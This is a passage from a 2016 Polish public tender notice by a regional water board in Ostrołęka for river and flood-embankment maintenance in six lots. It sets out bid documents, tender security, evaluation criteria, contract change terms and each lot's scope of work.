2). Wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania  zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.  Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 7 do SIWZ - WYKAZ SPRZĘTU TECHNICZNEGO.
3). Wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia w tym odpowiedzialnych za kierowanie robotami stanowiącymi przedmiot zamówienia, posiadającą doświadczenie w nadzorowaniu przedmiotowych prac zgodnych z opisem przedmiotu zamówienia, a także zakresu wykonywanych przez nie czynności  oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy sporządzić zgodnie z drukiem stanowiącym załącznik nr 6 do SIWZ - WYKAZ OSÓB.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">- Wypełniona oferta  złożona w formie pisemnej pod rygorem nieważności, w języku polskim zgodnie z drukiem formularza oferty stanowiącym zał. nr 1; 

- wypełniony i podpisany kosztorys ofertowy, który jest podstawą do obliczenia ceny oferty stanowiący załącznik nr 13 do SIWZ;

- Pełnomocnictwo lub inny dokument upoważniający do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego, w przypadku podpisania oferty przez inną osobę-y niż wymienione w odpisie z właściwego rejestru.
 
- Dokument ustanawiający Pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;

-W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1 Ustawy składa każdy z tych Wykonawców wspólnie ubiegających się o zamówienie tj. zał. nr 2 do SIWZ, 

- W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oświadczenie o braku podstaw do wykluczenia, o których mowa w art. 24 ust. 12-23 Ustawy składa każdy z tych Wykonawców wspólnie ubiegających się o zamówienie tj. zał. nr 3 do SIWZ.

- Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami do realizacji zamówienia, w szczególności przedstawiając w tym celu zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 5.W odniesieniu do warunków dotyczących doświadczenia i kwalifikacji zawodowych wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lub usługi do realizacji, których te zdolności są wymagane. W tym celu Zamawiający żąda w szczególności: w szczególności: - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia - czy podmiot, na zdolnościach którego wykonawca polega zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą;

- W przypadku polegania na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy PZP oprócz dokumentów o których mowa w rozdziale VI B pkt 4 i 5 SIWZ Wykonawca składa w odniesieniu do tych podmiotów:
1) informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 13,14 i 21 ustawy oraz odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art.24 ust.5 pkt 1 ustawy.
3) oświadczenia podmiotu  zgodnie z drukiem stanowiącym załącznik nr 9 do SIWZ -OŚWIADCZENIA PODMIOTU DOTYCZĄCE BRAKU PODSTAW WYKLUCZENIA
W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji więcej niż jednego podmiotu na zasadach określonych w art. 22a ustawy oświadczenie składa każdy z podmiotów osobno.

- Wykonawca w terminie 3 dni od dnia zamieszczenia informacji z otwarcia ofert na stronie internetowej zamawiającego, przekazuje oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej zgodnie z załącznikiem nr 4 do SIWZ. 
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Oferta powinna być zabezpieczona wadium w wysokości: 
	Część 1  - 2 500 zł,
	Część 2  - 2 750 zł,
	Część 3  - 1 250 zł,
	Część 4  - 2 000 zł,
	Część 5  - 3 250 zł,
	Część 6  - 1 250 zł.

2.	Wadium należy wnieść przed upływem terminu składania ofert.
3.	Wadium może być wniesione w formie:
	pieniężnej  przelewem na konto zamawiającego WZMIUW w Warszawie Oddział w Ostrołęce w Banku PKO Bank Polski Nr  58 1020 1026 0000 1202 0230 4897  przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek zamawiającego, potwierdzi, że otrzymał taki przelew najpóźniej do godz. 10.00 w dniu składania ofert. Kopię przelewu należy załączyć do oferty. 
	poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	gwarancji bankowych,
	gwarancji ubezpieczeniowych, 
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Dokumenty potwierdzające złożenie wadium w innej formie niż pieniężna, winny być wystawione na WZMiUW w Warszawie ul. Ksawerów 8; 02-656 Warszawa, a złożone przed upływem terminu składania ofert w oryginale w siedzibie Oddziału WZMiUW Oddział w Ostrołęce  pokój 16, w ofercie należy umieścić poświadczoną za zgodność kserokopię. 
Z treści gwarancji winno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy pzp.
4.	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców dokument poręczenia lub gwarancji wadialnej powinien być podpisany przez Pełnomocnika. 
5.	Wszelkie dokumenty zabezpieczające wadium winny być ważne, co najmniej przez okres związania ofertą tj. 30 dni.
6.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a. 
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
8.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie w/w pkt. 6 jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
10.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez wykonawcę.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art. 46 ust.4a i ust.5 pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>b.	Okres skrócenia realizacji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Niedopuszczalna jest, pod rygorem nieważności, zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy chyba, że konieczność wprowadzenia zmian wynika z okoliczności, o których mowa w ust. 2 niniejszego paragrafu. 
2. Strony mogą zmienić postanowienia zawartej umowy jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można uniknąć ani im zapobiec, a w szczególności zmiany mogą dotyczyć: 
1) zmiany w zakresie przedmiotu umowy jeżeli dla należytego wykonania zamówienia konieczne będzie wykonanie usług zamiennych, 
2) zmiany w zakresie wynagrodzenia w przypadku zaniechania części usług, wykonania usług zamiennych, 
3) zmiany osób pełniących funkcję osoby wyznaczonej do kontroli technicznej i osoby odpowiedzialnej za wykonanie usług. 
4) jeżeli warunki atmosferyczne ( np. powodzie, gwałtowne burze, inne anomalie klimatyczne) uniemożliwiają prowadzenie robót zgodnie z wymaganiami opisanymi w wytycznych przez okres powyżej 2 tygodni. Wstrzymanie robót z tego powodu musi być potwierdzone w Książce Kontroli Robót i zaakceptowane przez osobę wyznaczoną do kontroli technicznej ze strony Zamawiającego. Wstrzymanie robót ze względu na warunki atmosferyczne typowe ( właściwe) dla danej pory roku i miesiąca, lub zła organizacja robót nie uzasadniają zmiany terminu umowy. 
3. Strona występująca o zmianę postanowień zawartej umowy zobowiązania jest do uzasadnienia zaistnienia okoliczności, o których mowa w ust. 2 niniejszego paragrafu. Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 
4. Zmian postanowień umowy powodujących skutki finansowe można dokonać pod warunkiem zabezpieczenia środków w planie finansowym Zamawiającego zgodnie z ustawą o finansach publicznych. 
5. Strony umowy zobowiązują się do niezwłocznego powiadamiania o każdej zmianie adresu. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/09/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Ciek Bagienice, rzeki Jaciążki, rzeki Orzyc, rzeki Węgierki powiat makowski<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymanie rzeki Ciek Bagienice, gm. Krasnosielc, powiat makowski, 
2.	Utrzymanie rzeki Jaciążki, gm. Płoniawy-Bramura, powiat makowski,  
3.	Utrzymanie rzeki Orzyc, gm. Krasnosielc, powiat makowski, 
4.	Utrzymanie rzeki Węgierki, gm. Płoniawy-Bramura, powiat makowski, 

Zakres robót utrzymaniowych na w/w części obejmował będzie:
	wykoszenie porostów ręcznie i mechanicznie  ze skarp i poboczy rzeki, porost gesty, twardy, wraz z wygrabieniem
	ręczne wykoszenie porostów z dna rzeki, porost gesty, wraz z wygrabieniem
	usunięcie krzaków średniej gęstości ze skarp i ich odrostów
	ręczne usunięcie przetamowań, zatorów i wiatrołomów z koryta cieku

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Ruda, rzeki Kanał A,  powiat wyszkowski<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Utrzymanie rzeki Ruda, gm. Wyszków i Zabrodzie, powiat wyszkowski, 
2.	Utrzymanie rzeki Kanał A, gm. Rząśnik i Długosiodło, powiat wyszkowski, 
3.	Konserwacja wału  przeciwpowodziowy rzeki Bug odcinki Udrzyn-Tuchlin:  wał A, wał B; Tuchlin-Budy; Latoszek, powiat wyszkowski, 

Zakres robót utrzymaniowych na w/w części obejmował będzie:
	ręczne i mechaniczne wykoszenie porostów za skarp i poboczy z wygrabianiem,
	ręczne wykoszenie porostów z dna  z  wygrabieniem,	
	usunięcie krzaków ze skarp śr. gęstości i ich odrostów,
	usuwanie wiatrołomów, gałęzi i nieczystości z koryta rzeki,
	usuwanie tam bobrowych z koryta rzeki,
	wykonanie bieżącej konserwacji budowli poprzez oczyszczenie betonowych umocnień skarp i dna z namułu i porostów w obrębie budowli, dokonanie zabezpieczenia antykorozyjnego budowli oraz malowanie elementów metalowych (kolor niebieski), smarowanie ręcznego mechanizmu wyciągowego  jaz (1J) w km 6+580 i zastawka (1Z) w km 4+850 ( Rzeka Kanał A ),
	wykonanie palisady w obrębie zastawki (1Z)  i uzupełnienie ubytków w płytach betonowych w ubezpieczeniu skarp  (obmiar: robocizna  40 r-g; kołki śr. 8-10 dł. 150cm  szt. 166; beton  2 m; odwodnienie (grodzie, rura), koparko- ładowarka- 10m-g), ( Rzeka Kanał A ), 
	nadzór przyrodniczy,
	wykoszenie porostu ze skarp i korony wału porost gęsty miękki z wygrabieniem,
	usunięcie nieczystości (papiery, butelki) odc. wał Latoszek z wywiezieniem.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5, 45246400-7,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Orz, gmina Goworowo i Czerwin,  powiat ostrołęcki. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie wód rzeki Orz, gmina Goworowo i Czerwin,  powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Orz obejmował będzie:
	Mechaniczne wykoszenie i wygrabienie na ławę porostów ze skarp i ławy rzeki.
	Ręczne wykoszenie i wygrabienie na ławę porostów gęstych twardych ze skarp i ławy  rzeki.
	Ręczne wykoszenie porostów rzadkich z dna rzeki i wyrzucenie ich na ławę przy zarośnięciu dna 90%
	Mechaniczne wykoszenie porostów rzadkich z dna rzeki i wyrzucenie ich na ławę przy zarośnięciu
 dna 90 %
	Usunięcie przetamowań i powalonych drzew z koryta rzeki 
	Ręczna wycinka zakrzaczeń ze skarp rzeki.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Kanał Pełtówka, gmina Myszyniec, powiat ostrołęcki.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie wód rzeki Kanał Pełtówka, gmina Myszyniec, powiat ostrołęcki.

Zakres robót utrzymaniowych na rzece Kanał Pełtówka  obejmował będzie:
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 25/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Trybówka, gmina Czarnia, powiat ostrołęcki. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie wód rzeki Trybówka, gmina Czarnia, powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Trybówka  obejmował będzie
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 25/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Utrzymanie wód rzeki Kanał A Charciabałda, gmina Myszyniec, powiat ostrołęcki<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Utrzymanie wód rzeki Kanał A Charciabałda, gmina Myszyniec, powiat ostrołęcki. 

Zakres robót utrzymaniowych na rzece Kanał A Charciabałda  obejmował będzie
	Mechaniczne odmulenie dna rzeki wraz z rozplantowaniem urobku po odmuleniu, 
	Oczyszczenie terenu z pozostałości po rozplantowaniu urobku z odmulenia,
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90721800-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
